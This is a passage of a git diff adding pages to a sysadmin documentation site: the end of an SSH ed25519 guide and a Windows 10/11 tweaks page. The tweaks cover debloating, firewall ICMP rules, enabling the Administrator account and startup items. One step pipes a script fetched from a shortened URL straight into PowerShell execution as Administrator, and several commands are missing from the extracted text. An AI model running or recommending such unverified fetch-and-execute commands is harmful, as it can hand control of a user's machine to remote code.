file on the server. Step 5: Using SSH with ed25519 Keys for Secure Connections Now that you have your ed25519 SSH keys generated or imported, and added to the SSH Agent, you can use SSH to connect to remote servers or services like Git securely.
For example, to connect to a remote server:
ssh username@remote_host
+
Using SSH keys will also allow you to interact with Git repositories securely, which is especially helpful when dealing with private repositories or pushing code changes.
Wrapping Up By following this guide, you have configured the SSH client and SSH agent on your Windows system using ed25519 keys. This configuration ensures secure communication with services like Git and remote servers, safeguarding the integrity and security of your data.
Back to top
\ No newline at end of file
diff --git a/windows/windows-tweaks/index.html b/windows/windows-tweaks/index.html
new file mode 100644
index 000000000..fe1e899ec
--- /dev/null
+++ b/windows/windows-tweaks/index.html
@@ -0,0 +1,177 @@
+ Windows 10/11 Tweaks - 3os Windows Tweaks Authors: fire1ce | Created: 2022-06-15 | Last update: 2022-06-15 Windows 10/11 Tweaks Some tips, tricks, and tweaks for Windows 10/11 that may be helpful or even essential for you
Debloat Windows 10/11 PowerShell Script Source: Windows10Debloater GitHub Page
Run as Administrator:
iwr -useb https://git.io/debloat|iex
+
To enable the context menu that appeared in Windows 10 and earlier, you can use the following PowerShell snippet.
New-Item -Path "HKCU:\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32" -Value "" -Force
+
You may need to log out and log back in or restart explorer.exe
.
Get-Process explorer | Stop-Process
+
The context menu will now look like this:
Allow ICMP (Ping) in Windows Firewall The following commands will allow ICMP (Ping) in Windows Firewall. Use Powershell as Administrator to run the following commands.
For IPv4:
netsh advfirewall firewall add rule name = "ICMP Allow incoming V4 echo request" protocol = "icmpv4:8,any" dir = in action = allow
+
For IPv6:
netsh advfirewall firewall add rule name = "ICMP Allow incoming V6 echo request" protocol = "icmpv6:8,any" dir = in action = allow
+
Activate Administrator User Hit the Windows Key + R and type
Edit Administrator, uncheck - [ ] Account is disabled. Click OK
Right Click on Administrator and click Set Password
Launch "Network Connections" Hit the Windows Key + R and type
Add Program to Startup - Windows 7,8,10 & Servers Hit WIN+R or from start menu search run
and press enter. At run dialog enter shell:common startup
:
Create shortcut for the program you want to auto startup when Windows boots. Move the shortcut to the Startup
folder that opened before. Reboot or Shutdown Windows From Command Line (CMD) Reboot windows computer This command will set a time out of 10 seconds to close the applications. After 10 seconds, windows reboot will start.
Force reboot
Force Shutdown
Back to top
\ No newline at end of file